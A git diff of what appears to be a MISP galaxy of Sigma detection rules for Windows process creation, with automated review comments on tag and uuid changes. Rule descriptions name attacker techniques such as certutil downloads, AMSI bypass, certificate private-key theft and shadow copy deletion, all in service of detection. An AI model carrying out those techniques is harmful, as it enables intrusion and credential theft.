+ "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
 "https://twitter.com/egre55/status/1087685529016193025",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml"
 ],
 "tags": [
@@ -60829,8 +61732,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-",
 "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/",
+ "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml"
 ],
 "tags": [
@@ -60934,46 +61837,22 @@
 "https://redcanary.com/blog/blackbyte-ransomware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml"
 ],
- "tags": "No established tags"
- },
- "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135",
- "value": "Suspicious Windows Update Agent Empty Cmdline"
- },
- {
- "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2020/07/03",
- "falsepositive": [
- "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)",
- "When cmd.exe and xcopy.exe are called directly",
- "When the command contains the keywords but not in the correct order"
- ],
- "filename": "proc_creation_win_susp_copy_system32.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120",
- "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml"
- ],
 "tags": [
 "attack.defense_evasion",
- "attack.t1036.003"
+ "attack.t1036"
 ]
 },
 "related": [
 {
- "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "related-to"
 }
 ],
- "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767",
- "value": "Suspicious Copy From or To System32"
+ "uuid": "52d097e2-063e-4c9c-8fbb-855c8948d135",
+ "value": "Suspicious Windows Update Agent Empty Cmdline"
 },
 {
 "description": "Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.",
@@ -60988,13 +61867,34 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
 "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
 "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_export_certificate.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.credential_access",
+ "attack.execution",
+ "attack.t1552.004",
+ "attack.t1059.001"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9e716b33-63b2-46da-86a4-bd3c3b9b5dfb",
 "value": "Certificate Exported Via PowerShell"
 },
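Review bot: The first hunk here removes the cluster `fff9d2b7-e11c-4a69-93d3-40ef66189767` ("Suspicious Copy From or To System32") outright while the wuauclt entry `52d097e2-063e-4c9c-8fbb-855c8948d135` gains `attack.t1036` and a `related` link; the earlier hunk that drops `5b80cf53-3a46-4adc-960b-05ec19348d74` ("Wscript Execution from Non C Drive") has the same shape. Any consumer that already carries a galaxy tag for those uuids loses the ability to resolve it once the entry is gone, so if the upstream rules were deprecated rather than deleted, keeping the entries with their uuid and marking them deprecated in `meta` would preserve existing references; I cannot tell from the diff which case applies. git has interleaved the two entries in this hunk, so the t1036.003 → t1036 change is not a reclassification of one rule but the wuauclt rule's own technique replacing the deleted rule's lines. The enclosing wuauclt object starts before the hunk.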
@@ -61011,9 +61911,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib",
+ "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml"
 ],
 "tags": [
@@ -61103,8 +62003,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
 "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
+ "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
 "https://guides.lib.umich.edu/c.php?g=282942&p=1885348",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_extensions.yml"
 ],
@@ -61138,8 +62038,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md",
 "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
+ "https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_script_run.yml"
 ],
 "tags": [
@@ -61172,9 +62072,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
 "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md",
 "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html",
+ "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml"
 ],
 "tags": [
@@ -61241,8 +62141,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://ss64.com/nt/logman.html",
 "https://twitter.com/0gtweet/status/1359039665232306183?s=21",
+ "https://ss64.com/nt/logman.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logman_disable_eventlog.yml"
 ],
 "tags": [
@@ -61283,11 +62183,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/cglyer/status/1355171195654709249",
- "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html",
 "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
+ "https://twitter.com/cglyer/status/1355171195654709249",
 "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html",
+ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_uninstall_security_products.yml"
 ],
 "tags": [
@@ -61321,8 +62221,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/frgnca/AudioDeviceCmdlets",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md",
 "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml"
 ],
 "tags": [
@@ -61355,9 +62255,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf",
 "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml"
 ],
 "tags": [
@@ -61390,9 +62290,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://nodejs.org/api/cli.html",
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return",
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://nodejs.org/api/cli.html",
 "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml"
 ],
@@ -61427,8 +62327,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b",
- "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
 "https://github.com/hfiref0x/UACME",
+ "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml"
 ],
 "tags": [
@@ -61495,8 +62395,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior",
 "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware",
+ "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml"
 ],
 "tags": [
@@ -61562,8 +62462,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell",
 "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml"
 ],
 "tags": [
@@ -61632,8 +62532,28 @@
 "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.credential_access",
+ "attack.t1588.002",
+ "attack.t1003"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8",
 "value": "Suspicious Hacktool Execution - Imphash"
 },
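Review bot: The new `tags` array lists `attack.t1588.002` alongside `attack.t1003` but carries only the `attack.credential_access` tactic; T1588.002 sits under Resource Development, so the tactic tag that usually accompanies it (`attack.resource_development`) is missing, and a consumer that groups rules by tactic will not surface this entry there. The PCHunter hunk two lines down has the inverse gap: it adds `attack.execution` with no execution technique among its five technique tags. If these arrays are copied verbatim from the upstream Sigma rules, the fix belongs there; if the generator derives them, it could emit the tactic tag for every technique it links in `related`. The enclosing cluster object starts before the hunk.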
@@ -61703,20 +62623,25 @@
 "value": "Uncommon Child Processes Of SndVol.exe"
 },
 {
- "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n",
+ "description": "Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of \".asar\" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)\n",
 "meta": {
 "author": "Nasreddine Bencherchali (Nextron Systems)",
 "creation_date": "2022/10/21",
 "falsepositive": [
- "Unknown"
+ "Legitimate child processes can occur in cases of debugging"
 ],
 "filename": "proc_creation_win_susp_electron_app_children.yml",
 "level": "medium",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://taggart-tech.com/quasar-electron/",
 "https://github.com/mttaggart/quasar",
+ "https://taggart-tech.com/quasar-electron/",
+ "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf",
+ "https://lolbas-project.github.io/lolbas/Binaries/Msedge/",
+ "https://lolbas-project.github.io/lolbas/Binaries/Teams/",
+ "https://positive.security/blog/ms-officecmd-rce",
+ "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml"
 ],
 "tags": [
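Review bot: The new description ends with "(see related rule)" but nothing in this cluster entry identifies which rule that is; the galaxy's `related` list (outside this hunk) links ATT&CK technique uuids, not sibling Sigma rules, so a reader of the JSON cannot resolve the reference. If the generator has access to the upstream rule's own related-rule field, carrying the sibling rule's id or filename into `meta` would make the sentence actionable; otherwise the phrase is only meaningful in the upstream YAML. The description also keeps a trailing `\n` while the first sentence break was folded into a space, which looks like a leftover from the old multi-line form. The enclosing object continues past the hunk.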
@@ -61815,13 +62740,58 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/",
 "http://www.xuetr.com/",
+ "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/",
 "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.execution",
+ "attack.discovery",
+ "attack.t1082",
+ "attack.t1057",
+ "attack.t1012",
+ "attack.t1083",
+ "attack.t1007"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5",
 "value": "HackTool - PCHunter Execution"
 },
@@ -62029,8 +62999,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.sans.org/blog/wmic-for-incident-response/",
 "https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process",
+ "https://www.sans.org/blog/wmic-for-incident-response/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_process_creation.yml"
 ],
 "tags": [
@@ -62088,8 +63058,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/",
 "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/",
+ "https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml"
 ],
 "tags": [
@@ -62340,8 +63310,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/",
 "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
+ "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml"
 ],
 "tags": [
@@ -62397,9 +63367,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/",
- "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html",
 "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
+ "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html",
+ "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml"
 ],
 "tags": [
@@ -62423,9 +63393,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/",
+ "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
 "https://www.pureid.io/dumping-abusing-windows-credentials-part-1/",
 "https://twitter.com/0gtweet/status/1299071304805560321?s=21",
- "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"
 ],
 "tags": [
@@ -62527,9 +63497,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://en.wikipedia.org/wiki/HTML_Application",
 "https://www.echotrail.io/insights/search/mshta.exe",
 "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/",
+ "https://en.wikipedia.org/wiki/HTML_Application",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml"
 ],
 "tags": [
@@ -62562,10 +63532,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior",
- "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior",
- "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior",
 "https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior",
+ "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior",
+ "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior",
+ "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml"
 ],
 "tags": [
@@ -62600,10 +63570,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/",
- "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/",
- "https://twitter.com/gN3mes1s/status/1206874118282448897",
 "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
+ "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1027.004/T1027.004.md#atomic-test-1---compile-after-delivery-using-cscexe",
+ "https://twitter.com/gN3mes1s/status/1206874118282448897",
+ "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/",
+ "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml"
 ],
 "tags": [
@@ -62712,9 +63683,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
- "https://www.nirsoft.net/utils/nircmd2.html#using",
 "https://www.nirsoft.net/utils/nircmd.html",
+ "https://www.nirsoft.net/utils/nircmd2.html#using",
+ "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd_as_system.yml"
 ],
 "tags": [
@@ -62972,8 +63943,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)",
 "https://github.com/swagkarna/Defeat-Defender-V1.2.0",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_permission_modifications.yml"
 ],
@@ -63007,8 +63978,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
+ "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml"
 ],
 "tags": [
@@ -63073,8 +64044,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/danielbohannon/Invoke-DOSfuscation",
 "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf",
+ "https://github.com/danielbohannon/Invoke-DOSfuscation",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml"
 ],
 "tags": [
@@ -63107,8 +64078,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/",
 "https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html",
+ "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml"
 ],
 "tags": [
@@ -63218,8 +64189,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/",
 "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter",
+ "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml"
 ],
 "tags": [
@@ -63277,9 +64248,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file",
- "https://twitter.com/max_mal_/status/1542461200797163522",
 "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/",
 "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt",
+ "https://twitter.com/max_mal_/status/1542461200797163522",
 "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml"
 ],
@@ -63333,6 +64304,45 @@
 "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093",
 "value": "Start Windows Service Via Net.EXE"
 },
+ {
+ "description": "Detects execution of \"Diskshadow.exe\" in script mode to execute an script with a potentially uncommon extension.\nInitial baselining of the allowed extension list is required.\n",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/09/15",
+ "falsepositive": [
+ "False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required."
+ ],
+ "filename": "proc_creation_win_diskshadow_script_mode_susp_ext.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware",
+ "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/",
+ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow",
+ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
+ "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/",
+ "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4",
+ "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1218"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "1dde5376-a648-492e-9e54-4241dd9b0c7f",
+ "value": "Diskshadow Script Mode - Uncommon Script Extension Execution"
+ },
 {
 "description": "Detects user accept agreement 
execution in psexec commandline",
 "meta": {
@@ -63456,8 +64466,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
